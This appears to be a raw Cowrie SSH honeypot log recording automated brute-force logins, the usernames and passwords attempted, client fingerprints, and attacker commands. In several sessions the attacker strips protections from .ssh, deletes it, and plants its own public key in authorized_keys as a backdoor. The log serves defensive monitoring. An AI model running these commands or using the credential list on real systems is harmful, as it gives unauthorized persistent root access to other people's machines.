{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:37.574452Z","src_ip":"212.227.235.229","session":"5031d62afabc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:51:38.477135Z","src_ip":"212.227.235.229","session":"5031d62afabc"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:38.694530Z","src_ip":"212.227.235.229","session":"adf357dad6fa"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:38.695640Z","src_ip":"212.227.235.229","session":"5031d62afabc"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":60554,"dst_ip":"1.2.3.4","dst_port":22,"session":"0be081d62942","protocol":"ssh","message":"New connection: 77.90.185.47:60554 (1.2.3.4:22) [session: 0be081d62942]","sensor":"my-vps","timestamp":"2025-08-28T15:51:49.889119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:51:49.910069Z","src_ip":"77.90.185.47","session":"0be081d62942"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T15:51:49.911041Z","src_ip":"77.90.185.47","session":"0be081d62942"}
{"eventid":"cowrie.login.failed","username":"admin","password":"opnsense","message":"login attempt [admin/opnsense] failed","sensor":"my-vps","timestamp":"2025-08-28T15:51:50.010753Z","src_ip":"77.90.185.47","session":"0be081d62942"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:51.028380Z","src_ip":"77.90.185.47","session":"0be081d62942"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59956,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae7efa1c7375","protocol":"ssh","message":"New connection: 212.227.235.229:59956 (1.2.3.4:22) [session: ae7efa1c7375]","sensor":"my-vps","timestamp":"2025-08-28T15:51:54.804918Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:54.805756Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:55.030891Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.login.success","username":"root","password":"Cloud.123","message":"login attempt [root/Cloud.123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:51:55.975576Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:51:56.445498Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:51:56.446176Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:51:56.447120Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:56.673711Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:51:57.182116Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:51:57.182878Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:51:57.410070Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:51:57.410970Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32860,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b643ac7f8b9","protocol":"ssh","message":"New connection: 212.227.235.229:32860 (1.2.3.4:22) [session: 6b643ac7f8b9]","sensor":"my-vps","timestamp":"2025-08-28T15:51:57.654916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:51:57.655714Z","src_ip":"212.227.235.229","session":"6b643ac7f8b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:51:57.896712Z","src_ip":"212.227.235.229","session":"6b643ac7f8b9"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:51:58.901808Z","src_ip":"212.227.235.229","session":"6b643ac7f8b9"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:00.146642Z","src_ip":"212.227.235.229","session":"6b643ac7f8b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33868,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cb9c9e30546","protocol":"ssh","message":"New connection: 212.227.235.229:33868 (1.2.3.4:22) [session: 1cb9c9e30546]","sensor":"my-vps","timestamp":"2025-08-28T15:52:00.374787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:52:00.375688Z","src_ip":"212.227.235.229","session":"1cb9c9e30546"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:52:00.604366Z","src_ip":"212.227.235.229","session":"1cb9c9e30546"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:52:01.560902Z","src_ip":"212.227.235.229","session":"1cb9c9e30546"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:01.785964Z","src_ip":"212.227.235.229","session":"ae7efa1c7375"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:01.790261Z","src_ip":"212.227.235.229","session":"1cb9c9e30546"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33878,"dst_ip":"1.2.3.4","dst_port":22,"session":"42da5246bcc7","protocol":"ssh","message":"New connection: 212.227.235.229:33878 (1.2.3.4:22) [session: 42da5246bcc7]","sensor":"my-vps","timestamp":"2025-08-28T15:52:24.183068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:52:24.183770Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:52:24.489142Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.login.success","username":"root","password":"123465","message":"login attempt [root/123465] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:52:25.752855Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:52:26.778384Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:52:26.779117Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:52:26.780270Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:27.086738Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:52:27.716347Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:52:27.717052Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:52:28.028805Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:28.029667Z","src_ip":"212.227.235.229","session":"42da5246bcc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33880,"dst_ip":"1.2.3.4","dst_port":22,"session":"da5cbbb422ea","protocol":"ssh","message":"New connection: 212.227.235.229:33880 (1.2.3.4:22) [session: da5cbbb422ea]","sensor":"my-vps","timestamp":"2025-08-28T15:52:28.344716Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:52:28.345636Z","src_ip":"212.227.235.229","session":"da5cbbb422ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:52:28.662246Z","src_ip":"212.227.235.229","session":"da5cbbb422ea"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:52:29.973442Z","src_ip":"212.227.235.229","session":"da5cbbb422ea"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:52:31.293420Z","src_ip":"212.227.235.229","session":"da5cbbb422ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37452,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d46a3b75c40","protocol":"ssh","message":"New connection: 212.227.235.229:37452 (1.2.3.4:22) [session: 8d46a3b75c40]","sensor":"my-vps","timestamp":"2025-08-28T15:52:31.604455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:52:31.605179Z","src_ip":"212.227.235.229","session":"8d46a3b75c40"}
